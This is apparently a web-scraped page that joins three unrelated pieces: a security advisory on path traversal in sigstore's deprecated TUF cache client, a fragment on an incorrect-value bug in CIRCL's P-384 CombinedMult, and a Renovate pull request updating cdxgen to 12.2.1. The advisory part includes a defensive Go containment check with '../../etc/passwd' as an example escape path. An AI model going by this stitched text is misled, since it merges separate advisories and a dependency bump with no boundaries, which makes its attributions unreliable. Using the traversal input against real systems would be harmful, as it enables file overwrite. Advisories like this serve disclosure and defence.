CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:H/A:N
EPSS Score
0.015%
EPSS Percentile
3rd percentile
Description
Summary
The legacy TUF client pkg/tuf/client.go, which supports caching target files to disk, constructs a filesystem path by joining a cache base directory with a target name sourced from signed target metadata, but it does not validate that the resulting path stays within the cache base directory.
Note that this should only affect clients that are directly using the TUF client in sigstore/sigstore or are using an older version of Cosign. As this TUF client implementation is deprecated, users should migrate to https://github.com/sigstore/sigstore-go/tree/main/pkg/tuf as soon as possible.
Note that this does not affect users of the public Sigstore deployment, where TUF metadata is validated by a quorum of trusted collaborators.
Impact
A malicious TUF repository can trigger arbitrary file overwriting, limited to the permissions that the calling process has.
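The missing validation can be illustrated with a containment check after the join. This is a sketch, not sigstore's actual code; the function name is hypothetical, and it relies on the standard-library property that filepath.Join cleans its result, so an escape shows up as a ".."-prefixed relative path:

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// cachePath is an illustrative version of the check the advisory says is
// absent: join the cache base directory with an attacker-influenced target
// name, then verify the result still lies within the base directory.
func cachePath(baseDir, targetName string) (string, error) {
	p := filepath.Join(baseDir, targetName) // Join also Cleans the result
	rel, err := filepath.Rel(baseDir, p)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", fmt.Errorf("target %q escapes cache directory", targetName)
	}
	return p, nil
}

func main() {
	fmt.Println(cachePath("/var/cache/tuf", "targets/app.txt"))
	_, err := cachePath("/var/cache/tuf", "../../etc/passwd")
	fmt.Println(err != nil) // true
}
```

Without this check, a target name such as ../../etc/passwd in malicious metadata resolves outside the cache directory, which is exactly the arbitrary file overwrite described above.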
The CombinedMult function in the CIRCL ecc/p384 package (secp384r1 curve) produces an incorrect value for specific inputs. The issue is fixed by using complete addition formulas.
ECDH and ECDSA signing relying on this curve are not affected.
This PR contains the following updates:
12.2.0 → 12.2.1
Warning: Some dependencies could not be looked up. Check the Dependency Dashboard for more information.
Release Notes
cdxgen/cdxgen (cdxgen)
v12.2.1Compare Source
This release focuses on Node.js dependency accuracy, server-side submission hardening, and CI/build maintenance.
lang:node
#3920 added WASM and WASI detection in the JS analyzer with test coverage updates.
#3924 fixed npm component deduplication to preserve lockfile hashes when combining minified JS and package-lock inputs.
#3925 now sets cdx:npm:package:development=true for npm devDependencies, improving metadata fidelity for policy and filtering workflows.
server and submission integration
#3922 enhanced Dependency-Track BOM submit flow with configurable autoCreate and isLatest, plus strict parent mode validation across CLI and server paths.
#3918 hardened gitClone handling against malicious hook execution scenarios in server contexts.
build and release tooling
#3919 removed dependency on table, reducing runtime dependency surface and simplifying display/reporting internals.
#3911 updated CycloneDX spec version references across release-relevant configs and entry points (package.json, deno.json, pyproject.toml, bin/cdxgen.js, lib/cli/index.js).
compliance and compatibility
#3926 normalized object-form license data to CycloneDX-compliant fields in getLicenses.
Full Changelog: cdxgen/cdxgen@v12.2.0...v12.2.1
Configuration
📅 Schedule: (in timezone Europe/Berlin)
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR has been generated by Mend Renovate.